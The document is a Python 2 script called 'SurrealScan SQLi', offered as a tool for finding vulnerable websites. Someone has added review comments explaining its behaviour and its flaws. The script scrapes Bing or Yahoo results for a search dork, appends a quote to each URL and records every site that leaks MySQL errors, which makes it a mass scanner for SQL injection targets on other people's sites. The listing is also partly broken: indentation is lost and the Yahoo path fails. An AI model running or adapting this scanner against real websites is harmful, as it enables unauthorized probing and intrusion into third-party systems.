A simple tool for finding vulnerable websites...
Source:
Source:
#!/usr/bin/env python
# -*- coding: cp1252 -*-
'''
* Sofredor: Rodrigo Correia(#M0rph)
* Facebook: rodrigo.correia.3194
*
* Programa sem lei, você pode e deve copiar e retirar todos os créditos
* do autor, mas se lembre-se, você irá prejudicar um homem de familia,
* que trabalha arduamente todos os dias para alimentar seus filhos,
* passando muitas vezes nessecidades por falta de remuneração pelo
* trabalho prestado para sociedade. Então, pense bem em suas ações.
'''
import re, urllib, urlparse, threading, time
from BeautifulSoup import BeautifulSoup
# Module-level state shared by the functions below.
# NOTE(review): a `global` statement at module scope has no effect; `handle` is only bound later, inside IsVull().
global handle
# Substrings searched for in a fetched page. The first is the opening of MySQL's syntax-error
# message; the second is the prefix of PHP's mysql_fetch_* function names as they appear in PHP warnings.
# A page that echoes either string is leaking raw database errors to visitors. Turning error display off
# removes that leak but not the underlying injection flaw, which is closed by parameterized queries.
pattern_isvull = ["You have an error in your", "mysql_fetch_"] # you can add more
# Text printed once by main() at start-up.
Banner = '''[+] SurrealScan SQLi 0.1\n[+] Code by #M0rph
[+] FB: facebook.com/rodrigo.correia.3194
[+] Gretz: WhiteCollarGroup, http://darkhat.com.br, forum.guiadohacker.com.br
[+] The bitches... 0KaL, WCG147, Slevin, Brloopinha, LostShadow and others =s\n\n'''
# Fetch `url` with urllib.urlopen (Python 2 API) and return the whole response body.
# The call passes no timeout and no request headers, and the response object is never closed.
# Because no headers are set, requests carry urllib's default "Python-urllib/<version>" User-Agent,
# which is a usable signature when looking for this script in web-server logs.
def request(url):
res = urllib.urlopen(url)
result = res.read()
return result
# "limpar" is Portuguese for "clean": returns `string` after two str.replace() substitutions.
# NOTE(review): in this copy each replace() appears to show the same text on both sides, which would
# make it a no-op. Presumably the search strings were HTML entities that the hosting page decoded
# when rendering the listing. Confirm against the original file.
def limpar_str(string):
string = string.replace(" "," ")
string = string.replace("&", "&")
return string
# Collect result links from Bing for `query` and return them as a list of href strings.
# NOTE(review): indentation was lost in this copy, so the nesting of the loop body and the position of
# the final return are inferred from statement order only. Confirm against the original file.
# `query` is concatenated into the search URL as-is, with no URL-encoding.
def SearchBing(query):
#http://br.bing.com/search?q={query}&first={page}
# Regex capturing the href of the "next page" anchor (class sb_pagN) in the results markup.
pattern_nextpage = '<a href=\"([^\"]+)\" class=\"sb_pagN\"'
# Regex capturing the href of each result-title link.
pattern_getresult = 'sb_tlst\"><h3><a href=\"([^\"]+)\" h'
resultado = []
host = "http://br.bing.com"
url = host+"/search?q="+query+"&first=1"
text = ""
# Paging loop. The only visible exit is the break taken when no next-page link is matched.
while 1 == 1:
result = request(url)
pattern = re.compile(pattern_getresult)
text = re.findall(pattern, result)
for i in range(len(text)):
resultado.append(text[i])#print text[i]
pattern = re.compile(pattern_nextpage)
text = re.findall(pattern, result)
# All next-page matches are joined into one string; an empty string means there is no further page.
if ''.join(text) == '':
break
# The matched href is passed through limpar_str() and appended to the host for the next request.
url = host+limpar_str(''.join(text))
return resultado
# Collect result links from Yahoo Search for `query` and return them as a list of href strings.
# The steps mirror SearchBing: fetch a page, regex out the result hrefs, follow the next-page link.
# NOTE(review): indentation was lost in this copy, so the nesting of the loop body and the position of
# the final return are inferred from statement order only. Confirm against the original file.
# `query` is concatenated into the search URL as-is, with no URL-encoding.
def SearchYahoo(query):
# Regex capturing the href of the anchor with id "pg-next".
pattern_nextpage = '<a id=\"pg-next\" href=\"([^\"]+)\"' # OK
# Regex capturing the href of each result-title link (class "yschttl spt").
pattern_getresult = 'class=\"yschttl spt\" href=\"([^\"]+)\"' # OK
host = "http://search.yahoo.com"
url = host+"/search?p="+query+"&b=0&ei=UTF-8&y=Search&xargs=0&pstart=0"
text = ""
resultado = []
# Paging loop. The only visible exit is the break taken when no next-page link is matched.
while 1==1:
result = request(url)
pattern = re.compile(pattern_getresult)
text = re.findall(pattern, result)
for i in range(len(text)):
resultado.append(text[i])#print text[i]
pattern = re.compile(pattern_nextpage)
text = re.findall(pattern, result)
# All next-page matches are joined into one string; an empty string means there is no further page.
if ''.join(text) == '':
break
# The matched href is passed through limpar_str() and appended to the host for the next request.
url = host+limpar_str(''.join(text))
return resultado
# Thread target: request `url` with a single quote appended and record the URL in the shared
# output file when the response contains one of the pattern_isvull substrings.
# `current` and `end` are referenced only by the commented-out progress prints.
# What the check measures: whether the page echoes a database error. A site that hides its errors is
# never written to the file, so absence from the output says nothing about whether its queries are
# injectable. On the receiving side the probe appears as a GET whose URL ends in a lone "'".
def tester(url, current, end):
try:
#print "[+] Process: "+str(current)+" of "+str(end)
# `handle` is the file object opened by IsVull(); worker threads write to it with no lock visible here.
global handle
result = request(url+"'")
result = limpar_str(result)
# Every pattern is tested and no break is visible, so a page matching both is written once per match.
for j in range(len(pattern_isvull)):
if result.find(pattern_isvull[j]) != -1:
handle.write(url+"\n")
#print "[+] Process: "+str(i)+" of "+str(end)
#else:
# print "[+] Process: "+str(i)+" of "+str(end)
# The bare except discards every failure (network errors, writes to a closed file, ...) silently.
except:
pass
# Run tester() on every URL in `result_search` using threads, writing hits to "Vull.txt" in the
# current directory, then print how many URLs were recorded.
# NOTE(review): indentation was lost in this copy, so which statements sit inside the for loop or the
# if/else arms is inferred from statement order only. Confirm against the original file.
def IsVull(result_search):
try:
print "[+] Testing website..."
global handle
# Mode 'w' truncates any previous Vull.txt.
handle = open("Vull.txt", 'w')
# Header block: three text lines plus one blank line, i.e. four lines in the file.
handle.write('''[+] SurrealScan SQLI 0.1\n[+] Code by #M0rph\n[+] FB: facebook.com/rodrigo.correia.3194\n\n''')
for i in range(len(result_search)):
# Throttle on the number of live threads; the "-2" offset is presumably meant to discount
# threads that are not workers. TODO confirm what it was intended to exclude.
if threading.activeCount()-2 < 10:
t2 = threading.Thread(target=tester, args=(result_search[i], i, len(result_search)))
t2.start()
else:
# The for statement rebinds i on the next iteration, so this decrement does not persist.
i = i - 1
time.sleep(1)
# No join() on the worker threads is visible before the file is closed.
handle.close()
a = open("Vull.txt", 'r')
# Subtract the four header lines written above; `a` is never closed.
total_vull = len(a.readlines())-4
print "[+] Websites vull: "+str(total_vull)
# The bare except reports every failure as the same generic message.
except:
print "[-] Erro."
# Interactive entry point: print the banner, ask for a search engine and a search string ("dork"),
# collect result URLs, de-duplicate them and hand them to IsVull().
# Returns 1 on an invalid menu choice. int(search) raises ValueError on non-numeric input, and that
# is not caught here.
def main():
print Banner
search = raw_input("Search engine -> [1]Bing [2]Yahoo: ")
dork = raw_input("Enter with dork search(Ex: news.php?id=): ")
if int(search) == 1:
print "[!] Please, wait..."
result = SearchBing(dork)
elif int(search) == 2:
print "[!] Please, wait..."
# This branch binds `result_yahoo`; the code below reads `result`, which only the Bing branch binds.
result_yahoo = SearchYahoo(dork)
else:
print "[-] Option invalid."
return 1
# NOTE(review): the local name `re` shadows the imported `re` module inside main() only.
re = []
# set() removes duplicate URLs; the order of the resulting list is not defined.
result = set(result)
for i in result:
re.append(i)
print "\n[+] Number of results: "+str(len(re))
IsVull(re)
print "[+] Done."
# Runs unconditionally when the file is executed or imported (no __name__ guard).
main()